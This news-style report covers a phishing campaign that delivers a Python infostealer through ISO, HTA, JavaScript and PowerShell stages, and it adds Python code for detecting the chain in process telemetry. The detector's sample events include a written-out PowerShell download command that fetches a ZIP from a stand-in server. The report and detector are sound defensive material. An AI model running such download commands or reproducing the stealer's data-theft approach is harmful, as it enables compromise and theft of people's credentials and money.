Threat analysts have discovered a new advanced phishing attack that delivers a covert infostealer malware capable of exfiltrating a wide range of sensitive data.
The malware does not limit itself to traditional targets such as stored passwords; it also collects session cookies, credit card information, data from Bitcoin-related browser extensions and browsing history.
The collected data is then sent as a ZIP archive to an external e-mail account, which marks a significant shift in infostealer capabilities.
Attack method
According to an advisory published by Barracuda Networks, the attack begins with a phishing e-mail that lures recipients into opening an attached purchase order file.
These e-mails, characterized by grammatical errors, appear to come from a spoofed address. The attachment is an ISO disk image file, an exact replica of the data on an optical disk such as a CD or DVD. Embedded in this image is an HTA (HTML application) file, a format that lets applications run on the desktop without the security restrictions of a browser.
Executing the HTA file triggers a series of malicious payloads. The chain starts by downloading and executing an obfuscated JavaScript file from an external server, which in turn launches a PowerShell script that fetches a ZIP file from the same server.
The ZIP file contains a Python-based infostealer malware.
The malware runs only briefly to collect data and then deletes all of its files, including itself, to evade detection.
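As an added example (not code from the advisory or from Barracuda), the detection logic below walks process-creation telemetry for the chain described above: an HTA launch whose descendants include a script-host JavaScript run, a PowerShell download of a ZIP and a Python interpreter, all within a time window. The image names, command-line keywords, paths and sample events are assumptions constructed for the example.

```python
from collections import namedtuple

# ts = seconds since epoch, image = executable file name (lowercased)
ProcEvent = namedtuple("ProcEvent", "ts pid ppid image cmdline")

# Ordered stage predicates; mshta.exe runs HTA files on Windows (known fact, not from the advisory).
STAGES = [
    ("hta", lambda e: e.image == "mshta.exe" and ".hta" in e.cmdline.lower()),
    ("js", lambda e: e.image in {"wscript.exe", "cscript.exe"} and ".js" in e.cmdline.lower()),
    ("powershell", lambda e: e.image in {"powershell.exe", "pwsh.exe"} and ".zip" in e.cmdline.lower()
        and any(k in e.cmdline.lower() for k in ("downloadfile", "invoke-webrequest", "iwr "))),
    ("python", lambda e: e.image in {"python.exe", "pythonw.exe"}),
]

def descendants(root, children, window):
    """Processes descended from root that started within window seconds, in time order."""
    out, stack = [], [root]
    while stack:
        cur = stack.pop()
        for c in children.get(cur.pid, []):
            if 0 <= c.ts - root.ts <= window:
                out.append(c)
                stack.append(c)
    return sorted(out, key=lambda e: e.ts)

def find_chains(events, window=600, min_stages=3):
    """Return (mshta pid, matched stages) for each HTA launch whose descendants walk STAGES in order."""
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    alerts = []
    for root in filter(STAGES[0][1], events):
        matched, nxt = [STAGES[0][0]], 1
        for d in descendants(root, children, window):
            if nxt < len(STAGES) and STAGES[nxt][1](d):
                matched.append(STAGES[nxt][0])
                nxt += 1
        if len(matched) >= min_stages:
            alerts.append((root.pid, matched))
    return alerts

# Constructed sample telemetry (not from the advisory); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    ProcEvent(105, 4100, 4000, "mshta.exe", 'mshta.exe "E:\\PurchaseOrder.hta"'),
    ProcEvent(107, 4200, 4100, "wscript.exe", "wscript.exe C:\\Users\\Public\\stage1.js"),
    ProcEvent(110, 4300, 4200, "powershell.exe", "powershell.exe -w hidden -c "
              "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/p.zip', 'p.zip')"),
    ProcEvent(120, 4400, 4300, "python.exe", "python.exe C:\\Users\\Public\\p\\main.py"),
    ProcEvent(130, 5000, 4000, "mshta.exe", "mshta.exe C:\\Tools\\dashboard.hta"),  # benign, no follow-on
]
```

Because the last stage deletes itself, the process lineage is often the only durable evidence, which is why the logic keys on parent-child relationships rather than on files left on disk.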
Malware capabilities and data exfiltration
The infostealer is designed to collect extensive browser information and files.
It retrieves master keys from browsers such as Chrome, Edge, Yandex and Brave and harvests session cookies, stored passwords, credit card information and browser history. In addition, the malware collects data from Bitcoin-related browser extensions, including MetaMask and Coinbase Wallet.
The malware also targets PDF files and compresses entire folders into ZIP archives, including the Desktop, Downloads and Documents folders and specific %AppData% folders. The stolen data is then e-mailed to different addresses on the domain maternamedical.top, each designated for a specific type of information such as cookies, PDF files or browser content.
Implications for cyber security
According to Barracuda, this attack represents a new frontier in data exfiltration attacks, in which the sheer breadth of the malware's data collection poses serious risks.
“Most phishing attacks are associated with data theft, but here we are looking at an attack designed for extensive data exfiltration carried out by an advanced infostealer,” said Saravanan Mohan, Threat Analyst Manager at Barracuda.
“The volume and reach of sensitive information that can be taken is extensive. Some of it may be used in further malicious activity, such as lateral movement or financial fraud. As cybercriminals continue to develop advanced methods to steal critical information, it is important for companies to remain vigilant and proactive in their cybersecurity efforts.”
The key strategies recommended by the company include implementing robust security protocols, continuous monitoring for suspicious activity and educating employees about potential threats.
Multiple e-mail protection solutions using AI and machine learning are also useful for detecting and blocking such phishing attempts before they reach user inboxes.